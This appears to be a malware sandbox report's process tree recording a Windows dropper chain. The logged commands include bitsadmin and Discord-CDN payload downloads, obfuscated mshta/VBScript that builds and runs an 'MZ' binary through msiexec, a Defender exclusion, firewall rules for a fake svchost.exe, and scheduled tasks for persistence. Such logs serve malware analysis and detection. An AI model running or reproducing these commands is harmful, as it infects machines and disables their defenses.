                                                                                                                                  PID:4568
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\hfRWQcdalGPlSdecGjYWgh99.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\hfRWQcdalGPlSdecGjYWgh99.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4368
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-R4J9A.tmp\hfRWQcdalGPlSdecGjYWgh99.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-R4J9A.tmp\hfRWQcdalGPlSdecGjYWgh99.tmp" /SL5="$202AC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\hfRWQcdalGPlSdecGjYWgh99.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:4224
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-C0JLV.tmp\DYbALA.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-C0JLV.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                      6⤵
                                                                                                                                        PID:5552
                                                                                                                                        • C:\Program Files\7-Zip\MIDBCRSQAA\foldershare.exe
                                                                                                                                          "C:\Program Files\7-Zip\MIDBCRSQAA\foldershare.exe" /VERYSILENT
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4536
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\81-435e9-5e4-4faae-779d13af068e1\Nyshylamoqo.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\81-435e9-5e4-4faae-779d13af068e1\Nyshylamoqo.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Checks computer location settings
                                                                                                                                          PID:4960
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                            dw20.exe -x -s 2200
                                                                                                                                            8⤵
                                                                                                                                              PID:3456
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\97-3e64a-dcf-5769a-33453d0b0524b\Lotatiqama.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\97-3e64a-dcf-5769a-33453d0b0524b\Lotatiqama.exe"
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5976
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kt5q2ku5.ax4\GcleanerEU.exe /eufive & exit
                                                                                                                                              8⤵
                                                                                                                                                PID:6464
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kt5q2ku5.ax4\GcleanerEU.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\kt5q2ku5.ax4\GcleanerEU.exe /eufive
                                                                                                                                                  9⤵
                                                                                                                                                    PID:7064
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prqjttuq.5td\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6568
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\prqjttuq.5td\installer.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\prqjttuq.5td\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:7116
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jc5d4ki.aad\any.exe & exit
                                                                                                                                                      8⤵
                                                                                                                                                        PID:6636
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5jc5d4ki.aad\any.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\5jc5d4ki.aad\any.exe
                                                                                                                                                          9⤵
                                                                                                                                                            PID:6236
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4hkf2oki.el3\gcleaner.exe /mixfive & exit
                                                                                                                                                          8⤵
                                                                                                                                                            PID:6756
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4hkf2oki.el3\gcleaner.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4hkf2oki.el3\gcleaner.exe /mixfive
                                                                                                                                                              9⤵
                                                                                                                                                                PID:6704
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jll3pen3.x3h\autosubplayer.exe /S & exit
                                                                                                                                                              8⤵
                                                                                                                                                                PID:6888
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jll3pen3.x3h\autosubplayer.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jll3pen3.x3h\autosubplayer.exe /S
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  PID:6992
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:4228
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:8728
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:7112
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:6812
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:9076
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:7916
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:9188
                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                  "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                  10⤵
                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                  PID:2216
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\1HpT7fOCjRqwevyYF3NF9uzi.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\1HpT7fOCjRqwevyYF3NF9uzi.exe" /mixtwo
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5116
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4600
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5336
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5480
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:6008
                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:6120
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:5188
                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:1604
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:5036
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:600
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:6120
                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                  msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:8144
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill -f -iM "0Ynwrny1xR6Ce3aFOdXaV7vd.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:192
                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\e3ciN45LF9YSOx5uTssM_4x6.exe
                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\e3ciN45LF9YSOx5uTssM_4x6.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:4200
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:4900
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:4984
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\3fQcxDlp43cF_Lkgp2hF3etw.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\3fQcxDlp43cF_Lkgp2hF3etw.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:2280
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 896
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4540
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\m4B4l9UNQFjYJy2qOZ8ywGcq.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\m4B4l9UNQFjYJy2qOZ8ywGcq.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:3804
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\07110_23KBD6OrY29SHSSWf2.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\07110_23KBD6OrY29SHSSWf2.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:1844
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:5108
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 1624
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:4968
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\I5ybN5GcFFp2qz4bO557reWX.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\I5ybN5GcFFp2qz4bO557reWX.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    PID:3044
                                                                                                                                                                                    • C:\ProgramData\Application Data\S8LGJghE7EKxPiR6DNQktZgV.exe
                                                                                                                                                                                      "C:\ProgramData\Application Data\S8LGJghE7EKxPiR6DNQktZgV.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:6304
                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Uv2OLZQGQUISQFphMrVjFyks.exe
                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Uv2OLZQGQUISQFphMrVjFyks.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                      PID:2328
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\DC7E.bat "C:\Users\Admin\Pictures\Adobe Films\Uv2OLZQGQUISQFphMrVjFyks.exe""
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1700
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3612
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113305991643206/18.exe" "18.exe" "" "" "" "" "" ""
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3688
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113363139035156/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4480
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\32459\Transmissibility.exe
                                                                                                                                                                                            Transmissibility.exe
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4844
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4188
                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\YTDtEif11P99NgeKwT6fC4ch.exe
                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\YTDtEif11P99NgeKwT6fC4ch.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        PID:3584
                                                                                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4360
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5052
                                                                                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2628
                                                                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:4676
                                                                                                                                                                                              • C:\Windows\System\svchost.exe
                                                                                                                                                                                                "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                PID:2000
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:4708
                                                                                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4184
                                                                                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:4520
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\CObebYmiTdY_PuwpkFiVDpKe.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\CObebYmiTdY_PuwpkFiVDpKe.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                  PID:2096
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\CObebYmiTdY_PuwpkFiVDpKe.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\CObebYmiTdY_PuwpkFiVDpKe.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                    PID:700
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\uIhpaXRSRc02XMvQzI27rw3i.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\uIhpaXRSRc02XMvQzI27rw3i.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                  PID:2360
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\uIhpaXRSRc02XMvQzI27rw3i.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\uIhpaXRSRc02XMvQzI27rw3i.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4020
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\E7hLWHgMHAmG2ptzTZk60djt.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\E7hLWHgMHAmG2ptzTZk60djt.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:404
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:1008
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:1100
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4364
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\e4XxYUrzhL2kFffGJzG8cKA3.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\e4XxYUrzhL2kFffGJzG8cKA3.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:432
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RGR9L.tmp\e4XxYUrzhL2kFffGJzG8cKA3.tmp
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RGR9L.tmp\e4XxYUrzhL2kFffGJzG8cKA3.tmp" /SL5="$1025A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\e4XxYUrzhL2kFffGJzG8cKA3.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:3344
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-86Q9R.tmp\DYbALA.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-86Q9R.tmp\DYbALA.exe" /S /UID=2710
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                      PID:4560
                                                                                                                                                                                                      • C:\Program Files\Windows Defender\DXNCRVFAOV\foldershare.exe
                                                                                                                                                                                                        "C:\Program Files\Windows Defender\DXNCRVFAOV\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4184
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\c9-ea62f-f8f-c23ad-159f0c7797aa6\Velyxomere.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\c9-ea62f-f8f-c23ad-159f0c7797aa6\Velyxomere.exe"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                        PID:4516
                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                          dw20.exe -x -s 2156
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:4840
